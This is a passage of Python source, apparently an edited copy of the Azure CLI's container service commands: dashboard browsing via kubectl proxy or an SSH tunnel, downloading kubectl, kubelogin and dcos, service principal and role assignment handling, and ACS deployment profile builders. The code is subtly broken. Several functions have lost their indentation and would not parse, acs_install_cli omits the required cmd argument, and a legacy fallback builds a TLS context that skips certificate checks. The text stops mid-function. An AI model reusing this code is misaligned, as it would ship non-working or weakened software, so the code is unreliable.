def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
    """
    Opens a browser to the web interface for the cluster orchestrator
    :param name: Name of the target Azure container service instance.
    :type name: String
    :param resource_group_name: Name of Azure container service's resource group.
    :type resource_group_name: String
    :param disable_browser: If true, don't launch a web browser after establishing the proxy
    :type disable_browser: bool
    :param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
    :type ssh_key_file: string
    """
    # resolve the cluster first, then dispatch on its orchestrator type
    acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    _acs_browse_internal(
        cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
    """Dispatch the browse command to the orchestrator-specific implementation."""
    orchestrator_type = acs_info.orchestrator_profile.orchestrator_type  # pylint: disable=no-member
    is_kubernetes = (str(orchestrator_type).lower() == 'kubernetes' or
                     orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or
                     (acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'))  # pylint: disable=no-member
    if is_kubernetes:
        return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
    if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
        return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
    raise CLIError(
        'Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
    """
    Launch a proxy and browse the Kubernetes web UI.
    :param disable_browser: If true, don't launch a web browser after establishing the proxy
    :type disable_browser: bool
    """
    # resolve the cluster, then hand off to the internal helper that runs kubectl
    acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
    """Fetch cluster credentials, run ``kubectl proxy`` and optionally open the dashboard."""
    if not which('kubectl'):
        raise CLIError('Can not find kubectl executable in PATH')
    browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
    if os.path.exists(browse_path):
        # always start from a fresh kubeconfig
        os.remove(browse_path)
    _k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False)
    logger.warning('Proxy running on 127.0.0.1:8001/ui')
    logger.warning('Press CTRL+C to close the tunnel...')
    if not disable_browser:
        wait_then_open_async('http://127.0.0.1:8001/ui')
    subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
    """
    Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
    :param name: name: Name of the target Azure container service instance.
    :type name: String
    :param resource_group_name: Name of Azure container service's resource group.
    :type resource_group_name: String
    :param disable_browser: If true, don't launch a web browser after establishing the proxy
    :type disable_browser: bool
    :param ssh_key_file: Path to the SSH key to use
    :type ssh_key_file: string
    """
    # resolve the cluster, then hand off to the SSH-tunnel helper
    acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
    """Open an SSH tunnel to the DC/OS master via the octarine proxy and serve the dashboard locally."""
    if not os.path.isfile(ssh_key_file):
        raise CLIError(
            'Private key file {} does not exist'.format(ssh_key_file))
    acs = acs_client.ACSClient()
    if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
                       key_filename=ssh_key_file):
        raise CLIError('Error connecting to ACS: {}'.format(
            _get_host_name(acs_info)))
    octarine_bin = '/opt/mesosphere/bin/octarine'
    if not acs.file_exists(octarine_bin):
        raise CLIError(
            'Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
    # start the octarine proxy server on the cluster under a random id
    proxy_id = _rand_str(16)
    proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
    acs.run(proxy_cmd, background=True)
    # Parse the output to get the remote PORT
    proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
    stdout, _ = acs.run(proxy_client_cmd)
    remote_port = int(stdout.read().decode().strip())
    local_port = acs.get_available_local_port()
    # Set the proxy so local HTTP traffic is routed through the tunnel
    proxy.set_http_proxy('127.0.0.1', local_port)
    logger.warning('Proxy running on 127.0.0.1:%s', local_port)
    logger.warning('Press CTRL+C to close the tunnel...')
    if not disable_browser:
        wait_then_open_async('http://127.0.0.1')
    try:
        # blocks until interrupted, forwarding local_port to the cluster-side proxy
        acs.create_tunnel(
            remote_host='127.0.0.1',
            remote_port=remote_port,
            local_port=local_port)
    finally:
        proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
    """Install the client CLI matching the cluster's orchestrator (kubectl or dcos)."""
    acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    orchestrator_type = acs_info.orchestrator_profile.orchestrator_type  # pylint: disable=no-member
    kwargs = dict(install_location=install_location)
    if client_version:
        kwargs.update(client_version=client_version)
    if orchestrator_type == 'kubernetes':
        return k8s_install_cli(**kwargs)
    if orchestrator_type == 'dcos':
        return dcos_install_cli(**kwargs)
    raise CLIError(
        'Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
    """Build an SSL context for HTTPS downloads.

    Modern runtimes get the fully-validating default context; very old Pythons
    (or Windows Cloud Shell) fall back to a permissive TLS context.
    """
    needs_legacy_context = (sys.version_info < (3, 4) or
                            (in_cloud_console() and platform.system() == 'Windows'))
    if not needs_legacy_context:
        return ssl.create_default_context()
    try:
        # ssl.PROTOCOL_TLS was added in python 2.7.13 and 3.6
        return ssl.SSLContext(ssl.PROTOCOL_TLS)
    except AttributeError:
        return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def _urlretrieve(url, filename):
    """Download *url* and write the full response body to *filename*."""
    response = urlopen(url, context=_ssl_context())
    with open(filename, "wb") as out_file:
        out_file.write(response.read())
def _unzip(src, dest):
    """Extract the zip archive *src* into the directory *dest*.

    :raises CLIError: when the current platform is not Linux, macOS or Windows.
    """
    logger.debug('Extracting %s to %s.', src, dest)
    if platform.system() not in ('Linux', 'Darwin', 'Windows'):
        raise CLIError('The current system is not supported.')
    with zipfile.ZipFile(src, 'r') as archive:
        archive.extractall(dest)
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
    """
    Downloads the dcos command line from Mesosphere.

    :param install_location: file path to write the dcos binary to (required)
    :param client_version: dcos CLI version to download (default '1.8')
    :raises CLIError: on unsupported platform, missing install location,
        or download failure
    """
    system = platform.system()
    if not install_location:
        raise CLIError(
            "No install location specified and it could not be determined from the current platform '{}'".format(
                system))
    base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
    if system == 'Windows':
        file_url = base_url.format('windows', client_version, 'dcos.exe')
    elif system == 'Linux':
        # TODO Support ARM CPU here
        file_url = base_url.format('linux', client_version, 'dcos')
    elif system == 'Darwin':
        file_url = base_url.format('darwin', client_version, 'dcos')
    else:
        # Fix: the original raised a copy-pasted "Proxy server does not exist"
        # message here; this branch is about an unsupported operating system.
        raise CLIError('The system "{}" is not supported.'.format(system))
    logger.warning('Downloading client to %s', install_location)
    try:
        _urlretrieve(file_url, install_location)
        # Mark the downloaded binary as executable for everyone.
        os.chmod(install_location,
                 os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    except IOError as err:
        raise CLIError(
            'Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None, base_src_url=None,
                    kubelogin_version='latest', kubelogin_install_location=None,
                    kubelogin_base_src_url=None):
    """Install both kubectl and kubelogin in one step."""
    k8s_install_kubectl(cmd, client_version, install_location, base_src_url)
    k8s_install_kubelogin(
        cmd,
        kubelogin_version,
        kubelogin_install_location,
        kubelogin_base_src_url,
    )
def k8s_install_kubectl(cmd, client_version='latest', install_location=None, source_url=None):
    """
    Install kubectl, a command-line interface for Kubernetes clusters.

    :param client_version: kubectl release to install; 'latest' resolves the
        current stable version from the release server
    :param install_location: file path to write the kubectl binary to
    :param source_url: override the download base URL (defaults to the
        Kubernetes release bucket, or the Azure China mirror on that cloud)
    :raises CLIError: on unsupported platform or download failure
    """
    if not source_url:
        source_url = "https://storage.googleapis.com/kubernetes-release/release"
        cloud_name = cmd.cli_ctx.cloud.name
        if cloud_name.lower() == 'azurechinacloud':
            source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
    if client_version == 'latest':
        context = _ssl_context()
        version = urlopen(source_url + '/stable.txt', context=context).read()
        client_version = version.decode('UTF-8').strip()
    else:
        client_version = "v%s" % client_version
    file_url = ''
    system = platform.system()
    base_url = source_url + '/{}/bin/{}/amd64/{}'
    # ensure installation directory exists
    install_dir, cli = os.path.dirname(
        install_location), os.path.basename(install_location)
    if not os.path.exists(install_dir):
        os.makedirs(install_dir)
    if system == 'Windows':
        file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
    elif system == 'Linux':
        # TODO: Support ARM CPU here
        file_url = base_url.format(client_version, 'linux', 'kubectl')
    elif system == 'Darwin':
        file_url = base_url.format(client_version, 'darwin', 'kubectl')
    else:
        # Fix: the original raised a copy-pasted "Proxy server does not exist"
        # message here; this branch is about an unsupported operating system.
        raise CLIError('The system "{}" is not supported.'.format(system))
    logger.warning('Downloading client to "%s" from "%s"',
                   install_location, file_url)
    try:
        _urlretrieve(file_url, install_location)
        # Mark the downloaded binary as executable for everyone.
        os.chmod(install_location,
                 os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    except IOError as ex:
        raise CLIError(
            'Connection error while attempting to download client ({})'.format(ex))
    if system == 'Windows':  # be verbose, as the install_location likely not in Windows's search PATHs
        env_paths = os.environ['PATH'].split(';')
        found = next((x for x in env_paths if x.lower().rstrip(
            '\\') == install_dir.lower()), None)
        if not found:
            # pylint: disable=logging-format-interpolation
            logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
                           '    1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
                           'This is good for the current command session.\n'
                           '    2. Update system PATH environment variable by following '
                           '"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
                           'You only need to do it once'.format(install_dir, cli))
    else:
        logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
                       install_dir, cli)
def k8s_install_kubelogin(cmd, client_version='latest', install_location=None, source_url=None):
    """
    Install kubelogin, a client-go credential (exec) plugin implementing azure authentication.

    :param client_version: kubelogin release to install; 'latest' resolves the
        most recent tag from the GitHub releases API (or the China mirror)
    :param install_location: file path to write the kubelogin binary to
    :param source_url: override the download base URL
    :raises CLIError: on unsupported platform or download failure
    """
    cloud_name = cmd.cli_ctx.cloud.name
    if not source_url:
        source_url = 'https://github.com/Azure/kubelogin/releases/download'
        if cloud_name.lower() == 'azurechinacloud':
            source_url = 'https://mirror.azure.cn/kubernetes/kubelogin'
    if client_version == 'latest':
        context = _ssl_context()
        latest_release_url = 'https://api.github.com/repos/Azure/kubelogin/releases/latest'
        if cloud_name.lower() == 'azurechinacloud':
            latest_release_url = 'https://mirror.azure.cn/kubernetes/kubelogin/latest'
        latest_release = urlopen(latest_release_url, context=context).read()
        client_version = json.loads(latest_release)['tag_name'].strip()
    else:
        client_version = "v%s" % client_version
    base_url = source_url + '/{}/kubelogin.zip'
    file_url = base_url.format(client_version)
    # ensure installation directory exists
    install_dir, cli = os.path.dirname(
        install_location), os.path.basename(install_location)
    if not os.path.exists(install_dir):
        os.makedirs(install_dir)
    system = platform.system()
    if system == 'Windows':
        sub_dir, binary_name = 'windows_amd64', 'kubelogin.exe'
    elif system == 'Linux':
        # TODO: Support ARM CPU here
        sub_dir, binary_name = 'linux_amd64', 'kubelogin'
    elif system == 'Darwin':
        sub_dir, binary_name = 'darwin_amd64', 'kubelogin'
    else:
        # Fix: the original raised a copy-pasted "Proxy server does not exist"
        # message here; this branch is about an unsupported operating system.
        raise CLIError('The system "{}" is not supported.'.format(system))
    with tempfile.TemporaryDirectory() as tmp_dir:
        try:
            download_path = os.path.join(tmp_dir, 'kubelogin.zip')
            logger.warning('Downloading client to "%s" from "%s"',
                           download_path, file_url)
            _urlretrieve(file_url, download_path)
        except IOError as ex:
            raise CLIError(
                'Connection error while attempting to download client ({})'.format(ex))
        _unzip(download_path, tmp_dir)
        # The zip contains bin/<platform>/<binary>; move it into place.
        download_path = os.path.join(tmp_dir, 'bin', sub_dir, binary_name)
        shutil.move(download_path, install_location)
    # Mark the installed binary as executable for everyone.
    os.chmod(install_location, os.stat(install_location).st_mode |
             stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    if system == 'Windows':  # be verbose, as the install_location likely not in Windows's search PATHs
        env_paths = os.environ['PATH'].split(';')
        found = next((x for x in env_paths if x.lower().rstrip(
            '\\') == install_dir.lower()), None)
        if not found:
            # pylint: disable=logging-format-interpolation
            logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
                           '    1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
                           'This is good for the current command session.\n'
                           '    2. Update system PATH environment variable by following '
                           '"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
                           'You only need to do it once'.format(install_dir, cli))
    else:
        logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
                       install_dir, cli)
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
    """Create an AAD application and its service principal, retrying for replication lag.

    :returns: tuple (service_principal_app_id, aad_session_key); the first item
        is False when service principal creation never succeeded after retries.
    """
    # use get_progress_controller
    hook = cli_ctx.get_progress_controller(True)
    # Fix: the keyword was misspelled 'messsage' in the original, so the
    # progress text was passed as an unexpected kwarg instead of the message.
    hook.add(message='Creating service principal', value=0, total_val=1.0)
    logger.info('Creating service principal')
    # always create application with 5 years expiration
    start_date = datetime.datetime.utcnow()
    end_date = start_date + relativedelta(years=5)
    result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
                                                 start_date=start_date, end_date=end_date)
    service_principal = result.app_id  # pylint: disable=no-member
    # AAD replication can lag behind the application creation; retry with
    # linear backoff before giving up.
    for x in range(0, 10):
        hook.add(message='Creating service principal',
                 value=0.1 * x, total_val=1.0)
        try:
            create_service_principal(
                cli_ctx, service_principal, rbac_client=rbac_client)
            break
        # TODO figure out what exception AAD throws here sometimes.
        except Exception as ex:  # pylint: disable=broad-except
            logger.info(ex)
            time.sleep(2 + 2 * x)
    else:
        # Exhausted all retries without success.
        return False, aad_session_key
    hook.add(message='Finished service principal creation',
             value=1.0, total_val=1.0)
    logger.info('Finished service principal creation')
    return service_principal, aad_session_key
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
    """Create a role assignment, retrying while AAD replication catches up.

    Returns True on success (or if the assignment already exists), False when
    every retry failed.
    """
    # AAD can have delays in propagating data, so sleep and retry
    hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to propagate',
             value=0, total_val=1.0)
    logger.info('Waiting for AAD role to propagate')
    for attempt in range(10):
        hook.add(message='Waiting for AAD role to propagate',
                 value=0.1 * attempt, total_val=1.0)
        try:
            # TODO: break this out into a shared utility library
            create_role_assignment(
                cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
            break
        except CloudError as ex:
            # A pre-existing assignment counts as success.
            if ex.message == 'The role assignment already exists.':
                break
            logger.info(ex.message)
        except:  # pylint: disable=bare-except
            pass
        time.sleep(delay + delay * attempt)
    else:
        return False
    hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
    logger.info('AAD role propagation done')
    return True
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
                            scope=None, include_inherited=False, yes=None):
    """Delete role assignments either by explicit ids or by assignee/role/scope filters.

    :param ids: explicit assignment ids; mutually exclusive with the filters
    :param assignee: principal whose assignments should be removed
    :param role: role name or id to filter on
    :param yes: skip the "delete everything" confirmation prompt
    :raises CLIError: when ids are combined with other filters
    """
    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments
    definitions_client = factory.role_definitions
    ids = ids or []
    if ids:
        if assignee or role or resource_group_name or scope or include_inherited:
            raise CLIError(
                'When assignment ids are used, other parameter values are not required')
        for i in ids:
            assignments_client.delete_by_id(i)
        return
    # No filters at all means every assignment in the subscription would be
    # deleted -- confirm first. (Fix: 'assignee' was listed twice in the
    # original any() call.)
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
        msg = 'This will delete all role assignments under the subscription. Are you sure?'
        if not prompt_y_n(msg, default="n"):
            return
    scope = _build_role_scope(resource_group_name, scope,
                              assignments_client.config.subscription_id)
    assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
                                           scope, assignee, role, include_inherited,
                                           include_groups=False)
    if assignments:
        for a in assignments:
            assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
    """Delete a role assignment, retrying while AAD replication catches up.

    Returns True when the deletion eventually succeeded, False when every
    retry failed with a transient CloudError.
    """
    # AAD can have delays in propagating data, so sleep and retry
    hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
    logger.info('Waiting for AAD role to delete')
    for attempt in range(10):
        hook.add(message='Waiting for AAD role to delete',
                 value=0.1 * attempt, total_val=1.0)
        try:
            delete_role_assignments(cli_ctx,
                                    role=role,
                                    assignee=service_principal,
                                    scope=scope)
        except CLIError as ex:
            # User-facing errors are not retryable.
            raise ex
        except CloudError as ex:
            logger.info(ex)
            time.sleep(delay + delay * attempt)
            continue
        break
    else:
        return False
    hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
    logger.info('AAD role deletion done')
    return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
                             scope, assignee, role, include_inherited, include_groups):
    """Find role assignments matching the given scope/assignee/role filters.

    Listing strategy: an explicit scope wins (listed server-side with
    'atScope()'), otherwise list by assignee, otherwise list everything.
    Scope, role and assignee filters are then re-applied client-side.

    :param include_inherited: also match assignments on parent scopes
    :param include_groups: when listing by assignee, include assignments
        granted via group membership ('assignedTo' filter)
    :returns: list of role assignment objects
    """
    assignee_object_id = None
    if assignee:
        assignee_object_id = _resolve_object_id(cli_ctx, assignee)
    # always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
    if scope:
        assignments = list(assignments_client.list_for_scope(
            scope=scope, filter='atScope()'))
    elif assignee_object_id:
        if include_groups:
            f = "assignedTo('{}')".format(assignee_object_id)
        else:
            f = "principalId eq '{}'".format(assignee_object_id)
        assignments = list(assignments_client.list(filter=f))
    else:
        assignments = list(assignments_client.list())
    if assignments:
        # Client-side scope filter: keep exact-scope matches, plus parent-scope
        # matches when include_inherited is set.
        assignments = [a for a in assignments if (
            not scope or
            include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
            _get_role_property(a, 'scope').lower() == scope.lower()
        )]
        if role:
            role_id = _resolve_role_id(role, scope, definitions_client)
            assignments = [i for i in assignments if _get_role_property(
                i, 'role_definition_id') == role_id]
        if assignee_object_id:
            assignments = [i for i in assignments if _get_role_property(
                i, 'principal_id') == assignee_object_id]
    return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
def list_acs_locations(cmd, client):
    """List Azure regions where ACS is available, split into production and preview sets."""
    locations = {
        "productionRegions": regions_in_prod,
        "previewRegions": regions_in_preview,
    }
    return locations
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(
default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
                                  agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
                                  agent_ports, agent_storage_profile):
    """Build the agentPoolProfiles section of the ContainerService resource.

    With no *agent_profiles*, a single default pool named 'agentpool0' is
    produced; otherwise each user-supplied profile overrides the defaults.
    """
    default_agent_pool_profile = {
        "count": int(agent_count),
        "vmSize": agent_vm_size,
        "osType": os_type,
        "dnsPrefix": dns_name_prefix + 'agent',
    }
    if api_version == "2017-07-01":
        # The 2017-07-01 API accepts a richer agent profile.
        default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
            "count": int(agent_count),
            "vmSize": agent_vm_size,
            "osDiskSizeGB": int(agent_osdisk_size),
            "osType": os_type,
            "dnsPrefix": dns_name_prefix + 'agent',
            "vnetSubnetID": agent_vnet_subnet_id,
            "ports": agent_ports,
            "storageProfile": agent_storage_profile,
        })
    if agent_profiles is None:
        return [_update_dict(default_agent_pool_profile, {"name": "agentpool0"})]
    # override agentPoolProfiles by using the passed in agent_profiles
    agent_pool_profiles = []
    for idx, ap in enumerate(agent_profiles):
        # if the user specified dnsPrefix, we honor that
        # otherwise, we use the idx to avoid duplicate dns name
        merged = _update_dict(
            {"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
        agent_pool_profiles.append(
            _update_dict(default_agent_pool_profile, merged))
    return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
def _get_user_assigned_identity_resource_id_regular_expression():
return re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
    """Fetch a user-assigned managed identity by its ARM resource id.

    :param resource_id: full ARM id of the identity; parsed case-insensitively
    :returns: the identity object from the MSI service
    :raises ResourceNotFoundError: when the identity does not exist
    :raises ClientRequestError: for any other service error
    :raises InvalidArgumentValueError: when the id cannot be parsed
    """
    resource_id = resource_id.lower()
    _re_user_assigned_identity_resource_id = _get_user_assigned_identity_resource_id_regular_expression()
    match = _re_user_assigned_identity_resource_id.search(resource_id)
    if match:
        # Group order: subscription, resource group, identity name.
        subscription_id = match.group(1)
        resource_group_name = match.group(2)
        identity_name = match.group(3)
        msi_client = get_msi_client(cli_ctx, subscription_id)
        try:
            identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
                                                               resource_name=identity_name)
        except CloudError as ex:
            # Distinguish "not found" from other service failures.
            if 'was not found' in ex.message:
                raise ResourceNotFoundError("Identity {} not found.".format(resource_id))
            raise ClientRequestError(ex.message)
        return identity
    raise InvalidArgumentValueError(
        "Cannot parse identity name from provided resource id {}.".format(resource_id))
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
    """Return the client id of the user-assigned identity at *resource_id*."""
    identity = _get_user_assigned_identity(cli_ctx, resource_id)
    return identity.client_id
def _get_user_assigned_identity_object_id(cli_ctx, resource_id):
    """Return the principal (object) id of the user-assigned identity at *resource_id*."""
    identity = _get_user_assigned_identity(cli_ctx, resource_id)
    return identity.principal_id
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
               location=None, admin_username="azureuser", api_version=None, master_profile=None,
               master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
               master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
               agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
               agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
               orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
               windows=False, admin_password="", generate_ssh_keys=False,  # pylint: disable=unused-argument
               validate=False, no_wait=False):
    """Create a new Acs.
    :param resource_group_name: The name of the resource group. The name
    is case insensitive.
    :type resource_group_name: str
    :param deployment_name: The name of the deployment.
    :type deployment_name: str
    :param dns_name_prefix: Sets the Domain name prefix for the cluster.
    The concatenation of the domain name and the regionalized DNS zone
    make up the fully qualified domain name associated with the public
    IP address.
    :type dns_name_prefix: str
    :param name: Resource name for the container service.
    :type name: str
    :param ssh_key_value: Configure all linux machines with the SSH RSA
    public key string. Your key should include three parts, for example
    'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm
    :type ssh_key_value: str
    :param content_version: If included it must match the ContentVersion
    in the template.
    :type content_version: str
    :param admin_username: User name for the Linux Virtual Machines.
    :type admin_username: str
    :param api_version: ACS API version to use
    :type api_version: str
    :param master_profile: MasterProfile used to describe master pool
    :type master_profile: dict
    :param master_vm_size: The size of master pool Virtual Machine
    :type master_vm_size: str
    :param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
    :type master_osdisk_size: int
    :param master_count: The number of masters for the cluster.
    :type master_count: int
    :param master_vnet_subnet_id: The vnet subnet id for master pool
    :type master_vnet_subnet_id: str
    :param master_storage_profile: The storage profile used for master pool.
    Possible value could be StorageAccount, ManagedDisk.
    :type master_storage_profile: str
    :param agent_profiles: AgentPoolProfiles used to describe agent pools
    :type agent_profiles: dict
    :param agent_vm_size: The size of the Virtual Machine.
    :type agent_vm_size: str
    :param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
    :type agent_osdisk_size: int
    :param agent_vnet_subnet_id: The vnet subnet id for master pool
    :type agent_vnet_subnet_id: str
    :param agent_ports: the ports exposed on the agent pool
    :type agent_ports: list
    :param agent_storage_profile: The storage profile used for agent pool.
    Possible value could be StorageAccount, ManagedDisk.
    :type agent_storage_profile: str
    :param location: Location for VM resources.
    :type location: str
    :param orchestrator_type: The type of orchestrator used to manage the
    applications on the cluster.
    :type orchestrator_type: str or :class:`orchestratorType
    <Default.models.orchestratorType>`
    :param tags: Tags object.
    :type tags: object
    :param windows: If true, the cluster will be built for running Windows container.
    :type windows: bool
    :param admin_password: The adminstration password for Windows nodes. Only available if --windows=true
    :type admin_password: str
    :param bool raw: returns the direct response alongside the
    deserialized response
    :rtype:
    :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
    instance that returns :class:`DeploymentExtended
    <Default.models.DeploymentExtended>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
    if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Validate the SSH public key before doing any remote work.
    if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
        raise CLIError(
            'Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
    subscription_id = get_subscription_id(cmd.cli_ctx)
    if not dns_name_prefix:
        dns_name_prefix = _get_default_dns_prefix(
            name, resource_group_name, subscription_id)
    rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
    if location is None:
        location = rg_location
    # if api-version is not specified, or specified in a version not supported
    # override based on location
    if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
        if location in regions_in_preview:
